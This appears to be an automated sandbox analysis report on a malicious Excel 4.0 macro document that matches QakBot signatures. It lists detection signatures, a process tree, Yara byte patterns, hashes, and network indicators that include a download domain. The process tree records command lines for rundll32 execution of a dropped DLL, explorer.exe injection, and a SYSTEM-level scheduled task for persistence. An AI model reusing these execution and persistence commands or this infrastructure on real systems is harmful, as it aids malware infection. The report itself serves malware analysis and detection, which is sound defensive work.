Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 9659e9a8_by_Libranalysis.xls

Overview

General Information

Sample Name:9659e9a8_by_Libranalysis.xls
Analysis ID:412182
MD5:9659e9a80fba8f055fbe4e3757b0fd88
SHA1:701af32440a369d3bf1533cf3d741904b614a470
SHA256:252bda62a929c697a8b96035c1a52314d88067e745799cb66ac5d9dd593379b0
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6780 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7104 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • explorer.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 6500 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5668 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • regsvr32.exe (PID: 4816 cmdline: regsvr32.exe -s 'C:\Users\user\ritofm.cvm' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5132 cmdline: -s 'C:\Users\user\ritofm.cvm' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 3912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • regsvr32.exe (PID: 984 cmdline: regsvr32.exe -s 'C:\Users\user\ritofm.cvm' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4780 cmdline: -s 'C:\Users\user\ritofm.cvm' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmpQakBotQakBot Payloadkevoreilly
  • 0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmpQakBotQakBot Payloadkevoreilly
  • 0x13a27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Unpacked PEs

SourceRuleDescriptionAuthorStrings
5.2.explorer.exe.ec0000.0.raw.unpackQakBotQakBot Payloadkevoreilly
  • 0x13a27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
1.3.rundll32.exe.49f0000.0.raw.unpackQakBotQakBot Payloadkevoreilly
  • 0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
5.2.explorer.exe.ec0000.0.unpackQakBotQakBot Payloadkevoreilly
  • 0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
1.3.rundll32.exe.49f0000.0.unpackQakBotQakBot Payloadkevoreilly
  • 0x12227:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6780, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 7104

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\ritofm.cvmJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htmJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: Binary string: ole32.pdb& source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdbB source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb4 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb8 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb> source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: mpr.pdbrn source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.745476578.0000000000B22000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.892965832.00000000003A2000.00000004.00000001.sdmp
Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbH source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbz source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb3 source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbj source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: combase.pdbr source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbd source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbP source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbV source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb~ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb* source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb\ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED0C51 FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: ue[1].htm.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 192.185.39.58:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.aadrm.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.office.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.onedrive.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://augloop.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cdn.entity.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://clients.config.office.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://config.edge.skype.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cortana.ai/api
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://cr.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dev.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://devnull.onenote.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://directory.services.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://graph.windows.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://graph.windows.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
